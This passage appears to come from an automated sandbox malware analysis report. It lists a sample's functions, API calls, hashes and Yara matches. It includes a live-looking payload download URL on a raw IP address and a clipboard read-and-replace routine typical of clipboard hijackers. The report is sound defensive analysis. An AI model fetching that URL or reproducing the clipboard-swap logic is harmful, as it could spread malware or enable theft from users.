                                                                                                                                                                                                                                            • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE7
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF7
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseCreateValue
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1818849710-0
                                                                                                                                                                                                                                            • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                                                                                                                                                            • Instruction ID: 415a99b38b1cf926e07f2752f011508d1a06d6109c2dcef31e57e84081a4d25d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABF0B4B650011CFFEB214F94DD89DBBBA7CEB007E9F100175FA01B2150D6B19E009664
                                                                                                                                                                                                                                            Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 475 42e074-42e081 call 431f5e 478 42e083-42e086 ExitThread 475->478 479 42e08c-42e094 475->479 479->478 480 42e096-42e09a 479->480 481 42e0a1-42e0a7 480->481 482 42e09c call 4354f6 480->482 483 42e0b4-42e0ba 481->483 484 42e0a9-42e0ab 481->484 482->481 483->478 487 42e0bc-42e0be 483->487 484->483 486 42e0ad-42e0ae CloseHandle 484->486 486->483 487->478 488 42e0c0-42e0ca FreeLibraryAndExitThread 487->488
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00431F5E: GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                                                                                                                                                                                              • Part of subcall function 00431F5E: _free.LIBCMT ref: 00431F98
                                                                                                                                                                                                                                              • Part of subcall function 00431F5E: SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 0042E086
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0AE
                                                                                                                                                                                                                                            • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1A6,?,?,0042E01D,00000000), ref: 0042E0C4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1198197534-0
                                                                                                                                                                                                                                            • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                                            • Instruction ID: 941e5d7bb2069d1fb9760ffb86e13a1db41397deee20687f00b4917166382ed0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BF054302006347BD735AF27E808A5B7A986F41775F584715FC25C22A1D768DD838659
                                                                                                                                                                                                                                            Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125windowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 489 40239e-4023ac 490 402561-402563 PostQuitMessage 489->490 491 4023b2-4023b7 489->491 492 402569-40256e 490->492 493 4023d0-4023d7 491->493 494 4023b9-4023cb DefWindowProcW 491->494 495 4023d9 call 401da4 493->495 496 4023de-4023e5 493->496 494->492 495->496 496->492 497 4023eb-40255f call 4010ba call 4029f4 496->497 497->492
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 004023C5
                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00402563
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MessagePostProcQuitWindow
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3873111417-0
                                                                                                                                                                                                                                            • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                            • Instruction ID: 43c76da2243f772c6aced19a3fe0e8e69066b3bbdff08d4cabba9d560eb75400
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02412E25A64340A5E730EFA5BD55B2633B0FF64722F10252BE528DB2B2E3B28540C35E
                                                                                                                                                                                                                                            Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101sleepCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 503 40155a-4016d0 Sleep call 4010ba 505 4016d5-4016d9 503->505
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001D1B), ref: 00401562
                                                                                                                                                                                                                                              • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                              • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _wcslen$Sleep
                                                                                                                                                                                                                                            • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                            • API String ID: 3358372957-3120454669
                                                                                                                                                                                                                                            • Opcode ID: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                                                                                                                                                            • Instruction ID: 033e26d6726dec48d9da5d172e0a3ce7e355aee553d479aaec466036f4edd3d7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ec5b8e6b587f5ffe173a4fe2956bfbb53381ca1a870b5d286590f738381d6d8e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E
                                                                                                                                                                                                                                            Function 00402960 Relevance: 3.0, APIs: 2, Instructions: 49COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0040298F
                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 0040299F
                                                                                                                                                                                                                                              • Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2843524283-0
                                                                                                                                                                                                                                            • Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                                                                                                                                                            • Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8
                                                                                                                                                                                                                                            Function 02490E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000400,?,?,02490223,?,?), ref: 02490E19
                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,02490223,?,?), ref: 02490E1E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                                                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                            • Instruction ID: 222b95ba1efed397dc51e845e48fe434b558f4b478ecd050a5280b6dec76a593
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20D0123514512877DB002A94DC09BCE7F1CDF05B66F008011FB0DD9180C770954046E5
                                                                                                                                                                                                                                            Function 00434186 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                            • Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754
                                                                                                                                                                                                                                            Function 0040369F Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __fread_nolock
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2638373210-0
                                                                                                                                                                                                                                            • Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                                                                                                                                                            • Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A
                                                                                                                                                                                                                                            Function 00402823 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 323602529-0
                                                                                                                                                                                                                                            • Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                                                                                                                                                            • Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54
                                                                                                                                                                                                                                            Function 00403CC2 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: H_prolog3_catch
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3886170330-0
                                                                                                                                                                                                                                            • Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                                                                                                                                                            • Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94
                                                                                                                                                                                                                                            Function 00432785 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __wsopen_s
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3347428461-0
                                                                                                                                                                                                                                            • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                            • Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9
                                                                                                                                                                                                                                            Function 0043CFCB Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                            • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                                            • Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4
                                                                                                                                                                                                                                            Function 004336A7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                            • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                                            • Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD
                                                                                                                                                                                                                                            Function 0040FB0C Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004103C7
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Exception@8Throw
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2005118841-0
                                                                                                                                                                                                                                            • Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                                                                                                                                                            • Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D
                                                                                                                                                                                                                                            Function 0043CD0A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                            • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                                                                                                                                                            • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                                                                                                                                                                                            Function 00B09F8D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00B09FDE
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745494815.0000000000B09000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B09000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_b09000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                            • Instruction ID: 4cf59bb0d1ce78d9132d7d57d63f9df41f8c1896ad0a5d94ad3c6abc69f942b2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6112B79A00208EFDB01DF98C985E98BFF5AF08350F0580A4F9489B362D771EA50EB81

                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                            Function 02491942 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0249194D
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001541), ref: 02491957
                                                                                                                                                                                                                                              • Part of subcall function 0249CE77: _strlen.LIBCMT ref: 0249CE8E
                                                                                                                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 02491984
                                                                                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 02491994
                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 024919B0
                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 024919DF
                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 02491B23
                                                                                                                                                                                                                                            • EmptyClipboard.USER32 ref: 02491B39
                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000001), ref: 02491B46
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 02491B70
                                                                                                                                                                                                                                            • SetClipboardData.USER32(00000001,00000000), ref: 02491B79
                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 02491B80
                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 02491BA4
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000002D2), ref: 02491BAF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                                            • String ID: 4#E$i
                                                                                                                                                                                                                                            • API String ID: 4246938166-2480119546
                                                                                                                                                                                                                                            • Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                                                                                                                                                                                            • Instruction ID: 63606adb81ef75338f9e99fff924674b777f75d393eb677b34fe5072a0c14ace
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47512630C00395DADB11DFA4ED55BED7B74FF2A306F04522AD809A2172EB709681CB69
                                                                                                                                                                                                                                            Function 02492361 Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0249239C
                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 024923B1
                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 024923B8
                                                                                                                                                                                                                                            • CreateSolidBrush.GDI32(00646464), ref: 024923CB
                                                                                                                                                                                                                                            • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024923EA
                                                                                                                                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0249240B
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 02492416
                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00000008,00000000), ref: 0249241F
                                                                                                                                                                                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02492443
                                                                                                                                                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 024924CE
                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 024924E6
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
